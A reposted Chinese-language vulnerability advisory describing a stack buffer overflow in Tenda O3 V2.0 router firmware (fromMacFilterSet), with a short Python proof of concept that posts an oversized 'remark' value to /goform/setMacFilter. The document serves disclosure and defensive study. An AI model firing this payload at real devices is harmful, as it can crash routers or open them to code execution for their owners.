Tenda O3 中的远程基于堆栈的缓冲区溢出

admin 2024年7月29日14:38:50评论8 views字数 499阅读1分39秒阅读模式

Tenda O3 中的远程基于堆栈的缓冲区溢出

受影响的版本

O3V2.0 V1.0.0.10(2478)

漏洞详细信息

O3V2.0 V1.0.0.10(2478)固件中的 函数存在堆栈溢出漏洞fromMacFilterSet,该v25, v28变量接收status, remark来自POST请求的参数,但由于用户可以控制 的输入status, remark,因此该语句sprintf可能导致缓冲区溢出,用户提供的 status, remark可能超出数组的容量v75,从而触发此安全漏洞。

Tenda O3 中的远程基于堆栈的缓冲区溢出

Tenda O3 中的远程基于堆栈的缓冲区溢出

Tenda O3 中的远程基于堆栈的缓冲区溢出

POC:

import requestsip = "192.168.84.101"url = "http://" + ip + "/goform/setMacFilter"payload = b"a"*2000data = {"mode": "3", "remark": payload}response = requests.post(url, data=data)

Tenda O3 中的远程基于堆栈的缓冲区溢出

https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/O3v2.0/fromMacFilterSet.md

原文始发于微信公众号(Ots安全):Tenda O3 中的远程基于堆栈的缓冲区溢出

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月29日14:38:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Tenda O3 中的远程基于堆栈的缓冲区溢出https://cn-sec.com/archives/3010450.html

发表评论

匿名网友 填写信息